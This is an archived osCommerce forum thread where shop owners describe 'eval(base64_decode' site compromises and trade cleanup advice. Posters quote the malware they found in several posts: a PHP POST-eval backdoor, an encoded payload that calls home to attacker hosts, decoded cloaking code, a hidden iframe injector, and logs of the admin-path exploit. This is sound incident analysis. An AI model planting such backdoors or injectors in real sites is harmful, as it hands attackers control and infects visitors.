Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

eval(base64_decode Hack


FIMBLE

Recommended Posts

I don't have any of the base64 code in my site. What I do have is a .gla file which is creating links to who knows where, and there is a .temp folder with hundreds of files in it that I keep deleting and they keep coming back. Google has placed this site on the "could be danergous" list. I moved the domain back to it's old host that still had the old files, and it's still bad. It must have happened a while ago, or again...?

 

Help?

Link to comment
Share on other sites

  • 3 weeks later...
  • Replies 125
  • Created
  • Last Reply

I'm going to cry...

I didn't realise I got hacked until today, when I noticed some odd error on the homepage of my store. It seems as though the hack took place this afternoon.

 

I've now gone in and removed some binary files that I've never seen before, but now, EVERY single one of my PHP files have this <?php /**/eval(base64_decode( blah blah in.

 

I don't even know where to start and finish the deletion from in each file.

I'm by no means technical and so some of the posts I've been reading go over my head. I don't even know how to rename my admin folder, I'm guessing it's surely not quite as simple as right clicking and renaming?

 

I'm so gutted about this and seriously considering closing my site once and for all. That's twice I've been hacked now in the last 6 months. It's too frustrating.

:angry: :blink:

Link to comment
Share on other sites

FYI mainly

 

It seems by coincidence I noticed a file added today and it was an eval base 64 script.

It was in it's own file called checkout_approve.php the code never made it to any other pages.

 

I also found a file called bground1.gif-fix.by.php

It contained one line: if(isset($_POST['code'])) {if ($_POST['code']!='') {eval(stripslashes($_POST

));exit;}}echo '000huyasse'

 

Anyone know what that is?

My experience relates to osCommerce Online Merchant v2.2 RC2

Link to comment
Share on other sites

A google search suggested to me that it's part of a larger hacking scheme.

 

You may have other hack files lurking in the shadows....

:'(

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

  • 4 weeks later...

I also found a file called bground1.gif-fix.by.php

It contained one line: if(isset($_POST['code'])) {if ($_POST['code']!='') {eval(stripslashes($_POST

));exit;}}echo '000huyasse'

 

Anyone know what that is?

 

Hope this will help out a little bit:

 

this code pretty much allows for an external html page (a form) to insert php code into your script and actually execute it, it works like this: you create a html page, build in a form and a textfield .. call it 'code' and send it to this php file

$_POST['code'] will contain the sent code and eval(stripslashes($_POST['code'])) will execute that code. it's a PHP backdoor to spy out your system, change system values and alikes.

 

this 'hack' doesn't come with magic though:

in order to even insert those codelines into your files, the 'attacker' must have access (ftp or alike) to your server and write permission to those php files

 

so the steps to clean up an infected system is: finding out how the attacker accessed your system

check out your server logfiles (ftp transferlogfiles for example might prove valuable, as you can see which files were modified and where they are, and thus simply removing the malicious code lines + changing password for the ftp account used)

also make sure to check your own system for trojans/keyloggers and the systems of everyone having access to that account

 

if you can't keep the 'attacker' out of your system, there's no need to even clean up the code as he'll just logon again and put it in again too

 

 

i personally am not too familiar with the OS-Commerce project but a few general things:

it is important to always check user inputted data. never allow filesystem access with $_POST or $_GET submitted information .. always hardcode filesystem links or at least check for valid input data with a switch/case

 

make sure the project does not rely on register_globals

 

make sure the project does not rely on eval (also no dynamic generated PHP code)

 

always properly escape sql data, if sql data contains numbers .. check that you really are handling numbers and nothing else

 

if those few guidelines are followed, your scripts will be pretty much secure against most attacks/exploits

 

hope this might help out a little bit

thank you for reading

Link to comment
Share on other sites

Hi, trying to follow this thread but completely new to code. I added an oscommerce cart (not live yet, in the process of customizing with the help of some of you!) to an existing joomla site that had been installed by someone else a while back.

 

Today I discovered an unrecognizable script eval(base 64_decode), at the end of several of the joomla php files (hadn't looked at these files previously - could have been there for ???), and found this thread.

 

Here it is, decoded:

 

if (preg_match('/live|msn|yahoo|Google|ask|aol|bot|google/', $_SERVER['HTTP_USER_AGENT'])) {
$get = "http://209.160.33.108/bot1.php?host=".$_SERVER['HTTP_HOST'];
if (function_exists("curl_init")) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $get);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
$out = curl_exec($c);
curl_close($c);
echo $out;
} else {
$out = file_get_contents($get);
echo $out;

.

 

Basic Q's - is this malicious? What does it mean, what does it do, and how do I find the "source file"? If the script is in the joomla files, does that mean I also have to replace oscommerce too? I was in the process of taking the security measures re oscommerce but had not yet done all of the steps.

 

Thanks. Sleepless. This is such a setback!!

Link to comment
Share on other sites

  • 2 months later...

That code above redirects visitors from search engines to other side.

ATM I have been deleted this weird script from few website now many times.

They all have same thing in log:

x.x.x.x - - [14/Jul/2010:01:39:16 +0300] "HEAD /admin/define_language.php/login.php HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
x.x.x.x - - [14/Jul/2010:01:39:17 +0300] "POST /admin/define_language.php/login.php?filename=cookie_usage.php&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
x.x.x.x - - [14/Jul/2010:01:39:17 +0300] "GET /cookie_usage.php?cookies=1 HTTP/1.1" 200 21058 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
x.x.x.x - - [16/Jul/2010:00:36:46 +0300] "HEAD /admin/define_language.php/login.php HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
x.x.x.x - - [16/Jul/2010:00:36:49 +0300] "POST /admin/define_language.php/login.php?filename=cookie_usage.php&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
x.x.x.x - - [16/Jul/2010:00:36:49 +0300] "GET /cookie_usage.php?cookies=1 HTTP/1.1" 200 21081 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
x.x.x.x - - [27/Jun/2010:18:39:26 +0300] "HEAD /admin/categories.php/login.php HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
x.x.x.x - - [27/Jun/2010:18:39:26 +0300] "POST /admin/categories.php/login.php?action=new_product_preview HTTP/1.1" 200 2185 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"

 

So its not FTP account that have been breaked, its XSS vulnerable.

Link to comment
Share on other sites

There seem to be a lot of different attacks using the "eval(base64_decode" technique.

 

I came across another example this week, here are a few details:

 

This string

 

<?php eval(base64_decode("ZnVuY3Rpb24gczM3KCRzKXtmb3IgKCRhID0gMDsgJGEgPD0gc3RybGVuKCRzKS0xOyAkYSsrICl7JGUgLj0gJHN7c3RybGVuKCRzKS0kYS0xfTt9cmV0dXJuKCRlKTt9ZXZhbChzMzcoJzsibW9jIj03M2MkOyJwdHRoIj03M2gkOyJzdGF0cyI9NzN6JCcpKTtldmFsKHMzNygnO10iVE5FR0FfUkVTVV9QVFRIIltSRVZSRVNfJD0zYXUkJykpO2V2YWwoczM3KCc7KSJyZWxibWFSIiAsInhlZG5hWSIgLCJyZXZpaGNyYV9haSIgLCJ0b0JOU00iICwicHJ1bFMiICwiZWxnb29HIih5YXJyYSA9IDczdSQnKSk7ZXZhbChzMzcoJ319O2xydSQgb2hjZTtdMVtscnUkID0gbHJ1JCA7KWxydSQsIiFvZyEiKGVkb2xweGUgPSBscnUkeykpIiFvZyEiLGxydSQocnRzcnRzKCBmaTspKV0iVFNPSF9QVFRIIltSRVZSRVNfJChlZG9jbmVscnUuIj1oJiIuKTNhdSQoZWRvY25lbHJ1LiI9YiYiLl0iUkREQV9FVE9NRVIiW1JFVlJFU18kLiI9aSIuIj9wIi4iaHAuIi4ibmkiLiIvNzNjJC4iLjczYyQuNzNjJC43M2MkLjczYyQuNzNjJC43M2MkLiIvLzoiLjczaCQoc3RuZXRub2NfdGVnX2VsaWZAID0gbHJ1JCA7KTAwODAxKykoZW1pdCwpInN0YXRzIig1ZG0sNzN6JChlaWtvb2N0ZXNAIHsgZXNsZSB9eyApKSldNzN6JFtFSUtPT0NfJCh0ZXNzaSggcm8gKSkzYXUkICwiaS8iIC4gKTczdSQgLCJ8IihlZG9scG1pIC4gIi8iKGhjdGFtX2dlcnAoKGZpJykpOw=="));?>

 

was appended to files like includes/header.php and a couple of others, which executes the following code:

 

$z37="stats";

$h37="http";

$c37="com";

$ua3=$_SERVER["HTTP_USER_AGENT"];

$u37 = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");

if ((preg_match("/" . implode("|", $u37) . "/i", $ua3)) or (isset($_COOKIE[$z37]))) {

 

}

else {

 

@setcookie($z37,md5("stats"),time()+10800);

$url = @file_get_contents($h37."://".$c37.$c37.$c37.$c37.$c37.$c37.".$c37/"."in".".ph"."p?"."i=".$_SERVER["REMOTE_ADDR"]."&b=".urlencode($ua3)."&h=".urlencode($_SERVER["HTTP_HOST"]));

 

if (strstr($url,"!go!")) {

 

$url = explode("!go!",$url); $url = $url[1];

echo $url;

}

 

}

 

which sends the following request

 

http://comcomcomcomcomcom.com/in_dot_php?i=ip.ip.ip.ip&b=Midori%2F0.2.2+%28X11%3B+Linux+x86_64%3B+U%3B+en-gb%29+WebKit%2F531.2%2B&h=www.website.com

 

DON'T CLICK THIS LINK

 

where ip.ip.ip.ip was the website IP address and www.website.com the URL.

 

in other words, requests the web page http://comcomcomcomcomcom.com/in.php (again, DON'T CLICK THIS LINK) with parameters of IP address, browser and server info and domain

 

The domain comcomcomcomcomcom.com was registered on Monday 13th Sep (the day of the attack) and WHOIS reveals that it is protected by privacyprotect.org.

 

Hope this helps!

Link to comment
Share on other sites

  • 3 weeks later...

I also have been hacked and found the malicious code. I banned a IP address a few days ago from Russia. They were on my site 12 hours and looked suspicious.

 

I used the decode hack and it didnt work for me. Can someone tell me which files were planted and need to be removed?

 

What a mess, we work so hard to get our sites perfect, and also get top rankings, only to be hacked.

 

Weird thing is my site works just fine, but the code is in every php file, and the company forex is listed a million times behind each page in the body.

Link to comment
Share on other sites

I was also hacked and it unfortunately went unnoticed as it did work fine most of the time. I used a search and replace and the code was found in 387 places. But as important, in the image file, there were "new files" that had either an index.php or htc access.php. There were also random php files throughout the image file. So be sure to check all of these files for anything unusual. I didn't find any in the download file (guess they hadn't got to that one. I blocked an IP address a few days ago from India, so it looks like this bot is from "around the world". Also, I missed this but my hosting co security "fixed" it. I still had a random weird error and what they found was a blank line at the end of the .php pages. So if after cleaning all the code, you still have errors, check this too. Oh, PLEASE make a clean backup! I used the search and replace because I wanted to know how widespread this was (and it was layers deep). Good luck!

Link to comment
Share on other sites

I just wanted to add a friend who hosts in NL got hacked, apparently they have been coming & going for almost a month now without her knowledge.

 

I just cleaned house there, drilling down through every folder and hereis what I found:

 

catalog/admin/includes/header.php REPLACED

catalog/admin/includes/languages/english/file_manager.php REMOVED

catalog/admin/includes/languages/german/file_manager.php REMOVED

catalog/images/default/one.php REMOVED

catalog/images/help.php REMOVED

catalog/images/PayPal_Fr_2010.zip REMOVED

catalog/includes/languages/dutch/cookie_usage.php REPLACED

catalog/templates/fallback/content/checkout_payment.tpl.php REPLACED

catalog/templates/OS03C00246/sub_header.php REPLACED

root/googlec27ee1f6f95b.php REMOVED

 

I'll be changing her passwords from here and having her go do a thorough scan of her system tonight, install KeyScrambler (which she is SUPPOSED to already have) and admonish her to NOT save passwords in the admin, ftp or hosting

Debbie D
Franklin County, VA "Moonshine Capitol of the World"
osCmax Mobile Template oscmaxtemplates.com

Link to comment
Share on other sites

I will add to that last post - I found two new login accounts on the admin side also - obviously I removed them.

 

I examined her logs as best I could, thankfully most of what I wanted was there.. these are the offending IPs

 

62.193.212.234

91.211.16.126

89.149.242.16

Debbie D
Franklin County, VA "Moonshine Capitol of the World"
osCmax Mobile Template oscmaxtemplates.com

Link to comment
Share on other sites

So I was hacked.

 

I downloaded all the files to my puter and deleted everything off the server. So Im down.

I used dreamweaver and serched the folder containing said files for "eval("?>".base64_decode(" and it came up with one file, aa.php. That file only contains that line of code.

 

1) Does that mean I am clean on the rest of the files? Or, should I be looking for other malicious files.

2) I am very concerned about using osC going forward. The hosting company I use offers osC as an instalable app, which is how I use it. They say it is version 2.2. I have seen on this site 2.2 XX. Where do I look to get the version of the osC I am using?

3) How do I go about getting someone to check out my store if or when I get it back up, for any flaws or security risks? Once found, how bout some help getting them fixed?

Link to comment
Share on other sites

So I was hacked.

 

I downloaded all the files to my puter and deleted everything off the server. So Im down.

I used dreamweaver and serched the folder containing said files for "eval("?>".base64_decode(" and it came up with one file, aa.php. That file only contains that line of code.

 

1) Does that mean I am clean on the rest of the files? Or, should I be looking for other malicious files.

2) I am very concerned about using osC going forward. The hosting company I use offers osC as an instalable app, which is how I use it. They say it is version 2.2. I have seen on this site 2.2 XX. Where do I look to get the version of the osC I am using?

3) How do I go about getting someone to check out my store if or when I get it back up, for any flaws or security risks? Once found, how bout some help getting them fixed?

 

1. Not necessarily. You need to look through every folder to see if there are files that don't belong. One place they love to drop PHP files is the /catalog/images folder. What I suggest if your installation is stock, get a brand new copy and upload that. If the install is modified, then get a fresh copy and use a program like Beyond Compare (worth every dime), and compare a fresh with what you have. If that was the only string you searched for there could be others that refer to that, so it would not be found in a search.

 

2. Try looking in catalog\admin\includes\application_top.php

// Define the project version

define('PROJECT_VERSION', 'osCMax v2.0.25');

Debbie D
Franklin County, VA "Moonshine Capitol of the World"
osCmax Mobile Template oscmaxtemplates.com

Link to comment
Share on other sites

I will add to that last post - I found two new login accounts on the admin side also - obviously I removed them.

 

I examined her logs as best I could, thankfully most of what I wanted was there.. these are the offending IPs

 

62.193.212.234

91.211.16.126

89.149.242.16

 

I've seen that 2nd one (Ukraine) in my Apache logs before.

 

[Tue Jun 08 02:00:16 2010] [error] [client 91.211.16.126] File does not exist: /var/www/vhosts/my_domain/httpdocs/catalog/admin

 

[Tue Jun 22 16:00:54 2010] [error] [client 91.211.16.126] File does not exist: /var/www/vhosts/my_domain/httpdocs/catalog/admin

[Tue Jun 22 16:00:54 2010] [error] [client 91.211.16.126] File does not exist: /var/www/vhosts/my_domain/httpdocs/catalog/admin

[Tue Jun 22 16:03:33 2010] [error] [client 91.211.16.126] File does not exist: /var/www/vhosts/my_domain/httpdocs/catalog/admin

[Tue Jun 22 16:05:33 2010] [error] [client 91.211.16.126] File does not exist: /var/www/vhosts/my_domain/httpdocs/catalog/admin

 

[Tue Sep 07 22:13:02 2010] [error] [client 91.211.16.126] client denied by server configuration: /var/www/vhosts/my_domain/httpdocs/catalog/admin

 

There are Many more incidences but notice from September I've implemented a .htaccess rule that basically blocks Turkey, Russia and Ukraine so I don't see them so often but that IP is a multiple snoop!

 

Wayne.....

Link to comment
Share on other sites

this 91.211.16.126 hacked my shop and I'm thinking about doing something against.

they put many google................php on the shop and as a result I get virus warning.

Here is the details about this compagny

 

Details zur IP-Adresse 91.211.16.126

 

% This is the RIPE Database query service.

% The objects are in RPSL format.

%

% The RIPE Database is subject to Terms and Conditions.

% See http://www.ripe.net/db/support/db-terms-conditions.pdf

 

% Note: This output has been filtered.

% To receive output for a database update, use the "-B" flag.

 

% Information related to '91.211.16.0 - 91.211.19.255'

 

inetnum: 91.211.16.0 - 91.211.19.255

netname: DIDAN-PI-NET

descr: Private Enterprise Khardikov Nikolay Nikolayevich

country: UA

org: ORG-KHAR1-RIPE

admin-c: ANDT-RIPE

tech-c: ANDT-RIPE

status: ASSIGNED PI

mnt-by: RIPE-NCC-END-MNT

mnt-lower: RIPE-NCC-END-MNT

mnt-by: DIDAN-MNT

mnt-routes: DIDAN-MNT

mnt-domains: DIDAN-MNT

source: RIPE # Filtered

 

organisation: ORG-KHAR1-RIPE

org-name: Private Enterprise Khardikov Nikolay Nikolayevich

org-type: OTHER

address: 35/94, Zeleniy

address: Makiyivka 86156, Ukraine

e-mail: [email protected]

mnt-ref: DIDAN-MNT

mnt-by: DIDAN-MNT

source: RIPE # Filtered

 

person: Andrey Trubnikov

address: 60/182, Zeleniy

address: Makiyivka 86156, Ukraine

phone: +380623277657

nic-hdl: ANDT-RIPE

e-mail: [email protected]

source: RIPE # Filtered

 

% Information related to '91.211.16.0/22AS47694'

 

route: 91.211.16.0/22

descr: Khardikov Nikolay Nikolayevich

origin: AS47694

mnt-by: DIDAN-MNT

source: RIPE # Filtered

 

% Information related to '91.211.16.0/24AS47694'

 

route: 91.211.16.0/24

descr: DIDAN NET

origin: AS47694

mnt-by: DIDAN-MNT

source: RIPE # Filtered

 

 

 

 

 

if someone has the some problem, it will be fun to work together

 

Maraika

 

 

I've seen that 2nd one (Ukraine) in my Apache logs before.

 

[Tue Jun 08 02:00:16 2010] [error] [client 91.211.16.126] File does not exist: /var/www/vhosts/my_domain/httpdocs/catalog/admin

 

[Tue Jun 22 16:00:54 2010] [error] [client 91.211.16.126] File does not exist: /var/www/vhosts/my_domain/httpdocs/catalog/admin

[Tue Jun 22 16:00:54 2010] [error] [client 91.211.16.126] File does not exist: /var/www/vhosts/my_domain/httpdocs/catalog/admin

[Tue Jun 22 16:03:33 2010] [error] [client 91.211.16.126] File does not exist: /var/www/vhosts/my_domain/httpdocs/catalog/admin

[Tue Jun 22 16:05:33 2010] [error] [client 91.211.16.126] File does not exist: /var/www/vhosts/my_domain/httpdocs/catalog/admin

 

[Tue Sep 07 22:13:02 2010] [error] [client 91.211.16.126] client denied by server configuration: /var/www/vhosts/my_domain/httpdocs/catalog/admin

 

There are Many more incidences but notice from September I've implemented a .htaccess rule that basically blocks Turkey, Russia and Ukraine so I don't see them so often but that IP is a multiple snoop!

 

Wayne.....

Link to comment
Share on other sites

this 91.211.16.126 hacked my shop and I'm thinking about doing something against.

they put many google................php on the shop and as a result I get virus warning.

Here is the details about this compagny

 

if someone has the some problem, it will be fun to work together

 

Maraika

 

 

You could try, I notice they dont have an abuse@ email address. In some cases you get a reply. I find it easier to just block ban the whole country, I'm not really looking to do business there to be honest. Same applies to Turkey and to a lesser extent the Russian Federation.

 

They even paid a visit today.

 

[sun Oct 17 15:15:53 2010] [error] [client 91.211.16.126] client denied by server configuration: /var/www/vhosts/my_domain/httpdocs/

 

Slightly different approach to normal

 

91.211.16.126 - - [17/Oct/2010:15:15:53 +0100] "GET / HTTP/1.1" 403 5227 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; WebMoney Advisor; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

 

Normal Modus operandi is looking for "admin" folder from a stock install.

Link to comment
Share on other sites

 

They all have same thing in log:

x.x.x.x - - [14/Jul/2010:01:39:16 +0300] "HEAD /admin/define_language.php/login.php HTTP/1.0" 200 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"
x.x.x.x - - [14/Jul/2010:01:39:17 +0300] "POST /admin/define_language.php/login.php?filename=cookie_usage.php&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)"

 

So its not FTP account that have been breaked, its XSS vulnerable.

 

It's more a case of stock "admin" vulnerable maybe? Error code "200" means it existed and the request was successful surely.

Link to comment
Share on other sites

  • 7 months later...

Greetings,

I have read the entire thread, installed most of the conrtibs, however i'm still getting the eval64 issue in my index.php file in my store...

I have had it decoded and it looks like this.

 

Can I "deny" the IP's below in my htaccess file?

if so how?

 

Many thanks

mike

 

error_reporting(0);

$bot = FALSE ;

$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');

$stop_ips_masks = array(

array("216.239.32.0","216.239.63.255"),

array("64.68.80.0" ,"64.68.87.255" ),

array("66.102.0.0", "66.102.15.255"),

array("64.233.160.0","64.233.191.255"),

array("66.249.64.0", "66.249.95.255"),

array("72.14.192.0", "72.14.255.255"),

array("209.85.128.0","209.85.255.255"),

array("198.108.100.192","198.108.100.207"),

array("173.194.0.0","173.194.255.255"),

array("216.33.229.144","216.33.229.151"),

array("216.33.229.160","216.33.229.167"),

array("209.185.108.128","209.185.108.255"),

array("216.109.75.80","216.109.75.95"),

array("64.68.88.0","64.68.95.255"),

array("64.68.64.64","64.68.64.127"),

array("64.41.221.192","64.41.221.207"),

array("74.125.0.0","74.125.255.255"),

array("65.52.0.0","65.55.255.255"),

array("74.6.0.0","74.6.255.255"),

array("67.195.0.0","67.195.255.255"),

array("72.30.0.0","72.30.255.255"),

array("38.0.0.0","38.255.255.255")

);

$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));

foreach ( $stop_ips_masks as $IPs ) {

$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));

if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}

}

foreach ($user_agent_to_filter as $bot_sign){

if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}

}

if (!$bot) {

echo '<iframe src="http://jlhhox.cz.cc/QQkFBwQBAgQHDAwHEkcJBQcEAQIEAAYBBw==" width="1" height="1"></iframe>';

}

Link to comment
Share on other sites

forgot to say, quick update

I have added *.cz.cc to the deny in the htaccess, so far so good, bandaid fix I think I cant find any more eval 64 in any other php file... fingers crossed while i lock down a little further.

Link to comment
Share on other sites

  • 6 months later...

Hello guys, sadly my forum was victim of this kind of attack too. I dont know if this will help you, but it did for me, (im talking about file clean ups, large amount of files)

 

http://imasdeweb.com/opensource/search_and_replace/search_and_replace.php.zip

 

Put this file in your root web folder and run it, it will fix all infected files and will make a backup too. To prevent this from happening again, put this in your php.ini and restart web server.

 

disable_functions = eval, base64_decode, gzinflate

 

Hope this will help someone in cleaning large amount of files.

Link to comment
Share on other sites

  • 3 months later...

@@kelvinJA2

 

The only cleaning tool is YOU. You have to manually check each and every file for malicious content and also remove an anomalous files on your server.

 

 

 

Chris

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...